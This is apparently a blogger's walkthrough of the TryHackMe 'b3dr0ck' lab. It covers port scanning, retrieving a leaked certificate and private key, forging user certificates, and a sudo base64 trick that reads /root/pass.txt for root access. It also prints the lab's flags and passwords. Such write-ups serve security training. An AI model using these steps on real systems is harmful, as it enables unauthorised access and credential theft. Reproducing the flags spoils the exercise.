Try Hack Me – b3dr0ck – b3dr0ck.v7
Enum The website was forwarded from 80 to 4040 ------------------------------------------- Welcome to ABC! Abbadabba Broadcasting Compandy We're in the process of building a website! Can you believe this technology exists in bedrock?!? Barney is helping to setup the server, and he said this info was important... Hey, it's Barney. I only figured out nginx so far, what the h3ll is a database?!? Bamm Bamm tried to setup a sql database, but I don't see it running.Looks like it started something else, but I'm not sure how to turn it off...He said it was from the toilet and OVER 9000! Need to try and secure connections with certificates... Nmap └─$ nmap 10.10.164.214 -sC -sV -p- Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 06:27 PDT Nmap scan report for 10.10.164.214 Host is up (0.16s latency). Not shown: 65530 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 1ac70071b665f582d824807248ad996e (RSA) | 256 3ab5252eea2b44582455ef82cee0baeb (ECDSA) |_ 256 cf10028e96d324adae7dd15a0dc486ac (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to https://10.10.164.214:4040/ |_http-server-header: nginx/1.18.0 (Ubuntu) 4040/tcp open ssl/yo-main? | fingerprint-strings: | GetRequest: | HTTP/1.1 200 OK | Content-type: text/html | Date: Mon, 27 Mar 2023 13:38:07 GMT | Connection: close | | HTTPOptions: | HTTP/1.1 200 OK | Content-type: text/html | Date: Mon, 27 Mar 2023 13:38:08 GMT | Connection: close | | ssl-cert: Subject: commonName=localhost | Not valid before: 2023-03-27T13:32:27 |_Not valid after: 2024-03-26T13:32:27 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 9009/tcp open pichat? | fingerprint-strings: | |_ What are you looking for? 54321/tcp open ssl/unknown |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=localhost | Not valid before: 2023-03-27T13:32:27 |_Not valid after: 2024-03-26T13:32:27 After running nmap checking all ports with the -p- tag I found 5 ports open. 22,80,4040,9009,54321 Opening up a web browser to port 80 I noticed that it was being forward to port 4040. I was greeted with this message Welcome to ABC! Abbadabba Broadcasting Compandy We're in the process of building a website! Can you believe this technology exists in bedrock?!? Barney is helping to setup the server, and he said this info was important... Hey, it's Barney. I only figured out nginx so far, what the h3ll is a database?!? Bamm Bamm tried to setup a sql database, but I don't see it running. Looks like it started something else, but I'm not sure how to turn it off... He said it was from the toilet and OVER 9000! Need to try and secure connections with certificates... I inspectd the web page and came up with nothing. So I figured I would check out port 9009. So I fired up nc. nc 10.10.164.214 9009 Try connecting using: socat stdio ssl:MACHINE_IP:54321,cert=<CERT_FILE>,key=<KEY_FILE>,verify=0 What are you looking for? You use this service to recover your client certificate and private key What are you looking for? client certificate Sounds like you forgot your certificate. Let's find it for you. -----BEGIN CERTIFICATE----- MIICoTCCAYkCAgTSMA0GCSqGSIb3DQEBCwUAMBQxEjAQBgNVBAMMCWxvY2FsaG9z dDAeFw0yMzAzMjcxMzMyMjdaFw0yNDAzMjYxMzMyMjdaMBgxFjAUBgNVBAMMDUJh cm5leSBSdWJibGUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDIKEJu npls8+98WiGi/oGe4cpNXqcUrLqGLRAcjQVDSt233t/ANZM8PW6x4lTzsLjGADfE zOU+yBWNQkCSvs1a4azjnxYvV4jprtk8L27rK0coovNhgX4dCY9xVQC/LiTsnyxD wPqxbv7QZ9YaqBeIS2kX+G5wxb51NV4X+CmTBC0N4R7dSSWwFDdFcuuvTG5ga+D2 QuR9EXpEhkoFRyyzFRwN8XLocUpifuAmPdw8Nz+hfQ17fo7+qIlr1/2HuTg2GcpE aLRVsF5ry42ZWbh6a+aqHxuL+nXqwh+eUkVsz9zpYOUZ24UjnAbVPuPkZVuhQ7B8 tWo2wRSCDmNefOldAgMBAAEwDQYJKoZIhvcNAQELBQADggEBAGO/bt4SH6unIl9U nHJODeNZsULOynUGB45UmddXWLMZL8IA0SBe1Pr9SM9goQA4ZYJilLkjVCM5BWtd 91IY5BqsyTLxWnTniciuieMO/RNdShoWoUhEP+07rjDeDFwNdPp9bKIsp0FpPWAc WqklKOwAtPuavADRJ8IzPHgk1tg1S2SlZbF6ka44g1sCC+38eVUUs9d4RWiGdtZE SM6+droalTgOzvCqLck1YjUT9z53SPXWQI0+lywlsc3fEomNtPWTHBAYH88R56eF Lz4IdizdU8eK+ZX8s3JAzwPNTXgNzY30mhuWhonWFJsabvOiHDIZBSuKHVzQssr3 Zcy7t/o= -----END CERTIFICATE----- What are you looking for? What are you looking for? private key Sounds like you forgot your private key. Let's find it for you... -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEAyChCbp6ZbPPvfFohov6BnuHKTV6nFKy6hi0QHI0FQ0rdt97f wDWTPD1useJU87C4xgA3xMzlPsgVjUJAkr7NWuGs458WL1eI6a7ZPC9u6ytHKKLz YYF+HQmPcVUAvy4k7J8sQ8D6sW7+0GfWGqgXiEtpF/hucMW+dTVeF/gpkwQtDeEe 3UklsBQ3RXLrr0xuYGvg9kLkfRF6RIZKBUcssxUcDfFy6HFKYn7gJj3cPDc/oX0N e36O/qiJa9f9h7k4NhnKRGi0VbBea8uNmVm4emvmqh8bi/p16sIfnlJFbM/c6WDl GduFI5wG1T7j5GVboUOwfLVqNsEUgg5jXnzpXQIDAQABAoIBAAcc7ydxOXCWxqb7 qQBa3Q5hZcgUGgnxDXvhNBZfqJU4nuJ+6CKzhLT6Vem6alxypk5bCaBTy73MbH+l oBfW8gNNy9AXAjnSeYocbZnm8aEn25KFH/MSIAI2KcPUSn+Ay00hZvhNbltJ34JW flRaLuPoEicI7BvT2y3dJKfjaM7RogLsjlAA+gu2L9OrHRDwQxAdRrDc14JAAc8i 5hwZi2HGoUunbZ7npI5vDkX2CQN9Q+ry+I0zZnL9DZ4cHueWja1JwYKe+DYjkZHF 2Ih65wvcO2GzT3NrSeXMFRtlpQYdsW+4B93gUKxDN3w8i6+OJHiOTD9HAzVzR/6M 4ZkIu/0CgYEA+OljyyAdD9Dk+2ct9Usz3N3wc+cBvugKlKz0rwl+21wGnGj4bsiw 2xpqVfm6a6uaasd8ZQjYV5QbHZZzYYOtc44mHDwloL4QAbMEOt7ciGQGp+UJ+lFb UwmsTvcnd+16Em0Tl8shYAhYH3hNSqkAuX49EOzSexEUeVWADpkV82cCgYEAzdtw /YBbA+EjMY1EHL8uqW44SYpqGwUWR2dYwCLXbvuaarqMDoeYe83Inkl/fES8/ihG 10EU1TdimKmQdx1/J0Uyk0faH3OY63fhj14cEm+CPLBXgP9ne5LvdswEZRnpWcYd pJfNikcihCq1JuffvTW8x556IOOrWSGwD0/c5psCgYEAo/ns2hXvz0mIb+5LIntG UUyMaW5XghKPVd6S2vTgc1YurL+iWikwCUdfogAARYopEgsU8eJf02Ioctd4b1c1 3xhYFuWwzDIpjVUHhljm45sxn02Nwy/xf8SxlNvRTnpNnvHopGkXNZKJq0GveW3Y olp9lDbPem+IE162G+fRxCUCgYEAzGmMIF21gvuri8fgC7+YISxOflAQnrYFcm/g BCJU1GLI6hRFgSQKOV2VSgBntEk5dhMejR6WBkcSA8/UoUNMAP3Ig9FEehi6j48i Ds//hhruMz9UFMcIxf+ZA9kAwDfjrH567vbCZf3O+3jBG1oCpQrYY0wtr70DZ+V4 wyulieMCgYEAzrYQhSmWpxE5AmVfb8ocLlfNMMZiYREP3GDvTVYljwRt8VLzEI48 L83AwrQ9nS4hVrSlJbtu63qgDyuEm4g5htyVi6AuzqAo4Q5Ik7ES/z04SqIcKCvf v7QZEyEfsDqIRV0H1XqKL1uDIkyARdMo3bGbO/AXMRsijPW86jfqnE0= -----END RSA PRIVATE KEY----- Well that was pretty easy. I copied the private key and cert to two files and gave them a file name
┌──(kali㉿kali)-[~/Desktop] socat stdio ssl:10.10.164.214:54321,cert=cert,key=rsakey,verify=0 Welcome: 'Barney Rubble' is authorized. b3dr0ck>
This service is for login and password hints b3dr0ck> password Password hint: d1ad7c0a3805955a35eb260dab4180dd (user = 'Barney Rubble') b3dr0ck>
This is where I made a mistake. I got the password hint: d1ad7c0a3805955a35eb260dab4180dd . But I took that as a hit. So I made the assumption that it was a hash. After more time then I wanted to admit I tried to figure out what was going on. So I left for a few hours and came back and I figured I would try d1ad7c0a3805955a35eb260dab4180dd as the password for the barney user. Which worked. Not really much of a password hint if you ask me.
That is the first question done.
THM{f05780f08f0eb1de65023069d0e4c90c}
Once I was logged in as barney I ran sudo -l which is the first
thing I always do.
Certutil bob barney.certificate.pem Running this command makes a new cert for bob under barney.certificate.pem Grab the cert and the private key just like before.
nc back into port 54321 with the new cert and key you created. socat stdio ssl:10.10.164.214:54321,cert=cert1,key=rsakey1,verify=0
Question two: YabbaDabbaD0000!
Once logged in as fred grab the flag.
Question 3:
THM{08da34e619da839b154521da7323559d}
As normal, new user run sudo -l. After running it I went to my favorite site GTFObins and checked base64.
Looks like I need to run LFILE=/root/pass.txt ./base64 "$LFILE" | BASE64 --decode
This took a couple of minutes to figure out. I had a good Feeling that it was base64 or base32. Was it both? I opened Cyberchef website and tried it both was. Then tried both of them. Base32 and Base64.
And now we have the password for root: flintstonesvitamins su root flintstonesvitamins
There is our last flag
Question 4:
THM{de4043c009214b56279982bf10a661b7}